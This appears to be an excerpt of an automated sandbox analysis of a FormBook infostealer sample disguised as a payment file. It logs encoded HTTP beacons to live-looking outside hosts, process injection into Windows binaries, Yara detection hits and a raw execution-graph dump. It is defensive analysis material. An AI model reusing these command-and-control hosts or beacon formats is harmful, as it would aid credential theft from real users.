Data Raw: 78 30 77 48 6f 4a 38 58 3d 76 51 51 76 37 59 39 62 39 64 67 54 45 53 72 50 55 64 4a 57 4f 56 46 4c 48 44 6c 6a 41 4b 47 73 42 6b 4d 77 6c 4f 71 72 6a 6d 4c 74 4a 71 36 73 66 6c 43 56 70 4e 57 62 30 2f 49 76 2b 58 79 59 6d 6f 48 52 4b 30 35 59 6f 63 6f 67 76 42 58 6f 71 57 59 72 62 62 38 4c 66 43 53 63 45 71 70 2b 41 39 65 4c 6e 33 75 7a 64 65 33 53 65 54 70 6f 74 57 6d 42 5a 32 64 65 61 4e 2f 75 71 67 68 6a 6a 73 6e 41 50 6d 65 35 6e 69 52 44 75 2f 44 68 4a 48 4d 36 6e 4b 5a 74 46 67 4e 53 47 6d 6c 6f 43 4d 4b 6f 2f 72 2f 7a 78 56 67 52 52 59 68 4c 78 6b 43 39 6d 49 37 36 2b 39 74 67 62 6f 36 42 4e 34 76 32 70 2b 2f 67 35 4c 79 34 6e 72 72 48 57 65 55 57 70 4e 77 39 6e 4c 38 51 64 45 4e 74 6e 46 4c 42 76 72 74 7a 6a 50 50 48 39 33 30 6c 32 37 32 67 56 64 68 68 36 73 6e 79 35 45 74 58 7a 2b 6b 73 4a 36 47 41 78 55 35 36 34 42 72 32 55 57 2b 78 54 59 43 38 2f 74 77 70 47 30 2f 55 4d 77 76 2f 6d 2b 4e 56 53 54 53 71 5a 49 44 2b 6f 59 55 63 6e 5a 32 79 58 41 5a 43 67 2f 75 6a 4e 52 4d 75 65 6c 70 64 35 [TRUNCATED]
Data Ascii: x0wHoJ8X= [TRUNCATED]
Sep 18, 2024 16:21:43.321335077 CEST | 391 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 18 Sep 2024 14:21:43 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.elsupertodo.net/2jit/
X-XSS-Protection: 1; mode=block
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        52192.168.2.553670148.72.152.17480
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:21:45.351696014 CEST564OUTGET /2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1fIExehuCYopzYdrD7nSEUYrIRB0qkneaQhNiSOa9oBZv5w==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.elsupertodo.net
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:21:45.847976923 CEST547INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:21:45 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 162
                                                        Connection: close
                                                        Location: https://www.elsupertodo.net/2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1fIExehuCYopzYdrD7nSEUYrIRB0qkneaQhNiSOa9oBZv5w==&2VDlJ=Z2VdhTx
                                                        X-XSS-Protection: 1; mode=block
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                        Session ID:53
                                                        Source IP:192.168.2.5
                                                        Source Port:53671
                                                        Destination IP:3.33.130.190
                                                        Destination Port:80
                                                        Timestamp:Sep 18, 2024 16:21:50.886434078 CEST
                                                        Bytes transferred:813
                                                        Direction:OUT
                                                        Data:POST /7xi5/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Origin: http://www.omexai.info
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.omexai.info/7xi5/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Ascii: x0wHoJ8X=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5CiWZP2aQuL6GwgZh15xpVWcHqYFITTVrQPByKY=


                                                        Session ID:54
                                                        Source IP:192.168.2.5
                                                        Source Port:53672
                                                        Destination IP:3.33.130.190
                                                        Destination Port:80
                                                        Timestamp:Sep 18, 2024 16:21:53.431540966 CEST
                                                        Bytes transferred:833
                                                        Direction:OUT
                                                        Data:POST /7xi5/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Origin: http://www.omexai.info
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.omexai.info/7xi5/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Ascii: x0wHoJ8X=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ616kX5QyZjy8xzfxsdNq1ieUvV92YkZ/bpqgAK0g


                                                        Session ID:55
                                                        Source IP:192.168.2.5
                                                        Source Port:53673
                                                        Destination IP:3.33.130.190
                                                        Destination Port:80
                                                        Timestamp:Sep 18, 2024 16:21:55.982006073 CEST
                                                        Bytes transferred:1850
                                                        Direction:OUT
                                                        Data:POST /7xi5/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Origin: http://www.omexai.info
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.omexai.info/7xi5/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


                                                        Session ID:56
                                                        Source IP:192.168.2.5
                                                        Source Port:53674
                                                        Destination IP:3.33.130.190
                                                        Destination Port:80
                                                        Timestamp:Sep 18, 2024 16:21:58.520375967 CEST
                                                        Bytes transferred:560
                                                        Direction:OUT
                                                        Data:GET /7xi5/?x0wHoJ8X=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELNT/uLCDt5nHY4Z1aiDsGH/lUra2tZ4EmQmJJAAh8o7sfXQ==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Timestamp:Sep 18, 2024 16:21:58.972949028 CEST
                                                        Bytes transferred:410
                                                        Direction:IN
                                                        Data:HTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Wed, 18 Sep 2024 14:21:58 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 270
                                                        Connection: close
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?x0wHoJ8X=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELNT/uLCDt5nHY4Z1aiDsGH/lUra2tZ4EmQmJJAAh8o7sfXQ==&2VDlJ=Z2VdhTx"}</script></head></html>


                                                        Target ID:0
                                                        Start time:10:17:20
                                                        Start date:18/09/2024
                                                        Path:C:\Users\user\Desktop\PAGO $830.900.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\PAGO $830.900.exe"
                                                        Imagebase:0xd70000
                                                        File size:1'280'512 bytes
                                                        MD5 hash:39C39D298AC66ACB85C47E7A647BAC4E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:10:17:21
                                                        Start date:18/09/2024
                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\PAGO $830.900.exe"
                                                        Imagebase:0xd90000
                                                        File size:46'504 bytes
                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2236251136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2236251136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2237968521.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2237968521.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2238057070.0000000006000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2238057070.0000000006000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:10:17:32
                                                        Start date:18/09/2024
                                                        Path:C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe"
                                                        Imagebase:0x6b0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4480505595.0000000004270000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4480505595.0000000004270000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:4
                                                        Start time:10:17:35
                                                        Start date:18/09/2024
                                                        Path:C:\Windows\SysWOW64\netbtugc.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                        Imagebase:0x980000
                                                        File size:22'016 bytes
                                                        MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4480467614.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4480467614.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:10:17:47
                                                        Start date:18/09/2024
                                                        Path:C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe"
                                                        Imagebase:0x6b0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:9
                                                        Start time:10:18:10
                                                        Start date:18/09/2024
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff79f9e0000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                          Execution Graph

                                                          Execution Coverage:3.3%
                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                          Signature Coverage:3.6%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:66
calls 91857->91860 91859 db38a5 91861 db38b1 91859->91861 92108 d768db 91859->92108 91862 d748ee 91860->91862 91865 d768db 68 API calls 91861->91865 92037 d7890f 91862->92037 91867 db38c7 91865->91867 91871 d74aaf 22 API calls 91867->91871 91868 d7b606 22 API calls 91869 d74907 91868->91869 92040 d7c117 91869->92040 91873 db38e4 91871->91873 91872 d74917 91874 d7b606 22 API calls 91872->91874 91875 d74aaf 22 API calls 91873->91875 91876 d7493d 91874->91876 91878 db3900 91875->91878 91877 d7c117 41 API calls 91876->91877 91879 d7494c 91877->91879 91880 d758e5 24 API calls 91878->91880 91884 d7c25d 22 API calls 91879->91884 91881 db3926 91880->91881 91882 d74aaf 22 API calls 91881->91882 91883 db3932 91882->91883 91885 d7c1c3 22 API calls 91883->91885 91886 d7496a 91884->91886 91887 db3940 91885->91887 92044 d74aaf 91886->92044 91889 d74aaf 22 API calls 91887->91889 91891 db394f 91889->91891 91895 d7c1c3 22 API calls 91891->91895 91893 d74984 91893->91867 91894 d7498e 91893->91894 91896 d949b8 _strftime 40 API calls 91894->91896 91897 db3965 91895->91897 91898 d74999 91896->91898 91899 d74aaf 22 API calls 91897->91899 91898->91873 91900 d749a3 91898->91900 91902 db3972 91899->91902 91901 d949b8 _strftime 40 API calls 91900->91901 91903 d749ae 91901->91903 91903->91878 91904 d749b8 91903->91904 91905 d949b8 _strftime 40 API calls 91904->91905 91906 d749c3 91905->91906 91907 d74a07 91906->91907 91909 d74aaf 22 API calls 91906->91909 91907->91891 91908 d74a13 91907->91908 91908->91902 92060 d77d93 91908->92060 91911 d749ea 91909->91911 91913 d7c1c3 22 API calls 91911->91913 91915 d749f8 91913->91915 91917 d74aaf 22 API calls 91915->91917 91917->91907 91919 d7890f 22 API calls 91921 d74a4c 91919->91921 91920 d78a30 23 API calls 91920->91921 91921->91919 91921->91920 91922 d74a90 91921->91922 91923 d74aaf 22 API calls 91921->91923 91922->91789 91923->91921 91925 d7481b __wsopen_s 91924->91925 91926 d74834 91925->91926 91927 db380d ___scrt_fastfail 91925->91927 92535 
d7592d 91926->92535 91930 db3829 GetOpenFileNameW 91927->91930 91932 db3878 91930->91932 91933 d784e7 22 API calls 91932->91933 91935 db388d 91933->91935 91935->91935 91937 d74852 92563 d76328 91937->92563 91941 d784f7 _wcslen 91940->91941 91942 db5777 91940->91942 91945 d78532 91941->91945 91946 d7850d 91941->91946 91943 d7ad22 22 API calls 91942->91943 91944 db5780 91943->91944 91944->91944 91948 d8fd5b 22 API calls 91945->91948 92834 d788bb 22 API calls 91946->92834 91950 d7853e 91948->91950 91949 d78515 __fread_nolock 91949->91799 91951 d8fd8b 22 API calls 91950->91951 91951->91949 91953 d73708 __wsopen_s 91952->91953 92835 d75ce6 91953->92835 91955 d7370d 91956 d73787 91955->91956 92846 d73c08 82 API calls 91955->92846 91956->91800 91958 d7371a 91958->91956 92847 d73a6d 84 API calls 91958->92847 91960 d73723 91960->91956 91961 d73727 GetFullPathNameW 91960->91961 91962 d784e7 22 API calls 91961->91962 91963 d73753 91962->91963 91964 d784e7 22 API calls 91963->91964 91965 d73760 91964->91965 91966 db3323 91965->91966 91967 d784e7 22 API calls 91965->91967 91967->91956 92852 d746ff 7 API calls 91968->92852 91970 d74555 91971 d7468e CreateWindowExW CreateWindowExW ShowWindow ShowWindow 91970->91971 91971->91811 91973 d756ed ___scrt_fastfail 91972->91973 92853 d76092 91973->92853 91975 d75773 91978 db40bd Shell_NotifyIconW 91975->91978 91979 d75791 Shell_NotifyIconW 91975->91979 92857 d757ae 91979->92857 91981 d757a7 91981->91817 91982->91818 91983->91800 91984->91807 91986 db1ef0 __wsopen_s 91985->91986 91987 d758f2 GetModuleFileNameW 91986->91987 91988 d7b606 22 API calls 91987->91988 91989 d75918 91988->91989 91990 d7592d 23 API calls 91989->91990 91991 d75922 91990->91991 91991->91813 91993 db3e1a 91992->91993 91994 d752ce 91992->91994 91996 d8fd5b 22 API calls 91993->91996 92885 d752df 91994->92885 91998 db3e24 _wcslen 91996->91998 91997 d752d9 91997->91829 91999 d8fd8b 22 API calls 91998->91999 92000 db3e5d __fread_nolock 91999->92000 92002 d76492 __wsopen_s 
92001->92002 92003 d784e7 22 API calls 92002->92003 92004 d764c4 92002->92004 92003->92004 92008 d764fa 92004->92008 92114 d7660f 92004->92114 92006 d765cb 92007 d76600 92006->92007 92009 d7b606 22 API calls 92006->92009 92007->91849 92008->92006 92010 d7b606 22 API calls 92008->92010 92013 d7660f 22 API calls 92008->92013 92117 d76aff 92008->92117 92011 d765f4 92009->92011 92010->92008 92012 d76aff 22 API calls 92011->92012 92012->92007 92013->92008 92129 d76832 LoadLibraryA 92015->92129 92020 db487c 92023 d768db 68 API calls 92020->92023 92021 d76898 LoadLibraryExW 92137 d767fb LoadLibraryA 92021->92137 92025 db4883 92023->92025 92027 d767fb 3 API calls 92025->92027 92028 db488b 92027->92028 92159 d76a95 92028->92159 92029 d768c2 92029->92028 92030 d768ce 92029->92030 92032 d768db 68 API calls 92030->92032 92034 d748d0 92032->92034 92034->91856 92034->91857 92036 db48b2 92038 d8fd5b 22 API calls 92037->92038 92039 d748fa 92038->92039 92039->91868 92041 d7c122 92040->92041 92042 d7c151 92041->92042 92293 d7c28f 41 API calls 92041->92293 92042->91872 92045 d74ad7 92044->92045 92046 d74ab9 92044->92046 92048 d784e7 22 API calls 92045->92048 92047 d74976 92046->92047 92049 d7c1c3 22 API calls 92046->92049 92050 d949b8 92047->92050 92048->92047 92049->92047 92051 d94a3b 92050->92051 92052 d949c6 92050->92052 92296 d94a4d 40 API calls 2 library calls 92051->92296 92059 d949eb 92052->92059 92294 d9f269 20 API calls _abort 92052->92294 92055 d94a48 92055->91893 92056 d949d2 92295 da277c 26 API calls _strftime 92056->92295 92058 d949dd 92058->91893 92059->91893 92061 d77d9b 92060->92061 92062 d8fd5b 22 API calls 92061->92062 92063 d77da9 92062->92063 92297 d783b0 92063->92297 92066 d783e0 92300 d7c910 92066->92300 92068 d783f0 92069 d8fd8b 22 API calls 92068->92069 92070 d74a31 92068->92070 92069->92070 92071 d78a30 92070->92071 92072 d78a46 92071->92072 92073 db58e4 92072->92073 92079 d78a50 92072->92079 92309 d721a5 22 API calls 92073->92309 92074 db58f1 92310 d7c5e7 23 
API calls messages 92074->92310 92077 db590f 92077->92077 92078 d78b64 92080 d8fd5b 22 API calls 92078->92080 92079->92074 92079->92078 92081 d78b6b 92079->92081 92080->92081 92081->91921 92083 de2c33 92082->92083 92084 d76abf 64 API calls 92083->92084 92085 de2c47 92084->92085 92311 de2d84 92085->92311 92088 de2c5d 92088->91859 92089 d76a95 40 API calls 92090 de2c74 92089->92090 92091 d76a95 40 API calls 92090->92091 92092 de2c84 92091->92092 92093 d76a95 40 API calls 92092->92093 92094 de2c9f 92093->92094 92095 d76a95 40 API calls 92094->92095 92096 de2cba 92095->92096 92097 d76abf 64 API calls 92096->92097 92098 de2cd1 92097->92098 92099 d9e99c ___std_exception_copy 21 API calls 92098->92099 92100 de2cd8 92099->92100 92101 d9e99c ___std_exception_copy 21 API calls 92100->92101 92102 de2ce2 92101->92102 92103 d76a95 40 API calls 92102->92103 92104 de2cf6 92103->92104 92105 de281c 27 API calls 92104->92105 92106 de2d0c 92105->92106 92106->92088 92317 de21ec 79 API calls 92106->92317 92109 d768e5 92108->92109 92110 d768ec 92108->92110 92318 d9e608 92109->92318 92112 d7690c FreeLibrary 92110->92112 92113 d768fb 92110->92113 92112->92113 92113->91861 92123 d7c7c9 92114->92123 92116 d7661a 92116->92004 92119 d76b0e 92117->92119 92122 d76b2f __fread_nolock 92117->92122 92118 d8fd5b 22 API calls 92120 d76b42 92118->92120 92121 d8fd8b 22 API calls 92119->92121 92120->92008 92121->92122 92122->92118 92124 d7c7dc 92123->92124 92125 d7c7d9 __fread_nolock 92123->92125 92126 d8fd5b 22 API calls 92124->92126 92125->92116 92127 d7c7e7 92126->92127 92128 d8fd8b 22 API calls 92127->92128 92128->92125 92130 d7684a GetProcAddress 92129->92130 92131 d76868 92129->92131 92132 d7685a 92130->92132 92134 d9e57b 92131->92134 92132->92131 92133 d76861 FreeLibrary 92132->92133 92133->92131 92167 d9e4ba 92134->92167 92136 d7688c 92136->92020 92136->92021 92138 d76810 GetProcAddress 92137->92138 92139 d7682f 92137->92139 92140 d76820 92138->92140 92142 d76920 92139->92142 92140->92139 92141 
d76828 FreeLibrary 92140->92141 92141->92139 92143 d8fd8b 22 API calls 92142->92143 92144 d76935 92143->92144 92219 d770c2 92144->92219 92146 d76941 __fread_nolock 92147 db48ca 92146->92147 92148 d76a45 92146->92148 92158 d7697c 92146->92158 92233 de2f6b 74 API calls 92147->92233 92222 d76122 CreateStreamOnHGlobal 92148->92222 92151 db48cf 92153 d76abf 64 API calls 92151->92153 92152 d76a95 40 API calls 92152->92158 92154 db48f2 92153->92154 92155 d76a95 40 API calls 92154->92155 92157 d76a0e messages 92155->92157 92157->92029 92158->92151 92158->92152 92158->92157 92228 d76abf 92158->92228 92160 d76aa7 92159->92160 92161 db491d 92159->92161 92255 d9e854 92160->92255 92164 de281c 92276 de266c 92164->92276 92166 de2837 92166->92036 92170 d9e4c6 ___scrt_is_nonwritable_in_current_image 92167->92170 92168 d9e4d4 92192 d9f269 20 API calls _abort 92168->92192 92170->92168 92172 d9e504 92170->92172 92171 d9e4d9 92193 da277c 26 API calls _strftime 92171->92193 92174 d9e509 92172->92174 92175 d9e516 92172->92175 92194 d9f269 20 API calls _abort 92174->92194 92184 da8001 92175->92184 92178 d9e51f 92179 d9e532 92178->92179 92180 d9e525 92178->92180 92196 d9e564 LeaveCriticalSection __fread_nolock 92179->92196 92195 d9f269 20 API calls _abort 92180->92195 92181 d9e4e4 __fread_nolock 92181->92136 92185 da800d ___scrt_is_nonwritable_in_current_image 92184->92185 92197 da2eee EnterCriticalSection 92185->92197 92187 da801b 92198 da809b 92187->92198 92191 da804c __fread_nolock 92191->92178 92192->92171 92193->92181 92194->92181 92195->92181 92196->92181 92197->92187 92206 da80be 92198->92206 92199 da8117 92200 da4c0d _abort 20 API calls 92199->92200 92201 da8120 92200->92201 92203 da2958 _free 20 API calls 92201->92203 92204 da8129 92203->92204 92205 da8028 92204->92205 92216 da3395 11 API calls 2 library calls 92204->92216 92211 da8057 92205->92211 92206->92199 92206->92205 92214 d9911d EnterCriticalSection 92206->92214 92215 d99131 LeaveCriticalSection 92206->92215 92209 da8148 
92217 d9911d EnterCriticalSection 92209->92217 92218 da2f36 LeaveCriticalSection 92211->92218 92213 da805e 92213->92191 92214->92206 92215->92206 92216->92209 92217->92205 92218->92213 92220 d8fd5b 22 API calls 92219->92220 92221 d770d4 92220->92221 92221->92146 92223 d7613c FindResourceExW 92222->92223 92227 d76159 92222->92227 92224 db42f1 LoadResource 92223->92224 92223->92227 92225 db4306 SizeofResource 92224->92225 92224->92227 92226 db431a LockResource 92225->92226 92225->92227 92226->92227 92227->92158 92229 db493d 92228->92229 92230 d76ace 92228->92230 92234 d9ec73 92230->92234 92233->92151 92237 d9ea3a 92234->92237 92236 d76adc 92236->92158 92238 d9ea46 ___scrt_is_nonwritable_in_current_image 92237->92238 92239 d9ea52 92238->92239 92241 d9ea78 92238->92241 92250 d9f269 20 API calls _abort 92239->92250 92252 d9911d EnterCriticalSection 92241->92252 92242 d9ea57 92251 da277c 26 API calls _strftime 92242->92251 92245 d9ea84 92253 d9eb9a 62 API calls 2 library calls 92245->92253 92247 d9ea98 92254 d9eab7 LeaveCriticalSection __fread_nolock 92247->92254 92249 d9ea62 __fread_nolock 92249->92236 92250->92242 92251->92249 92252->92245 92253->92247 92254->92249 92258 d9e871 92255->92258 92257 d76ab8 92257->92164 92259 d9e87d ___scrt_is_nonwritable_in_current_image 92258->92259 92260 d9e8bd 92259->92260 92261 d9e890 ___scrt_fastfail 92259->92261 92262 d9e8b5 __fread_nolock 92259->92262 92273 d9911d EnterCriticalSection 92260->92273 92271 d9f269 20 API calls _abort 92261->92271 92262->92257 92264 d9e8c7 92274 d9e688 38 API calls 4 library calls 92264->92274 92267 d9e8aa 92272 da277c 26 API calls _strftime 92267->92272 92268 d9e8de 92275 d9e8fc LeaveCriticalSection __fread_nolock 92268->92275 92271->92267 92272->92262 92273->92264 92274->92268 92275->92262 92279 d9e478 92276->92279 92278 de267b 92278->92166 92282 d9e3f9 92279->92282 92281 d9e495 92281->92278 92283 d9e408 92282->92283 92284 d9e41c 92282->92284 92290 d9f269 20 API calls _abort 92283->92290 92289 d9e418 
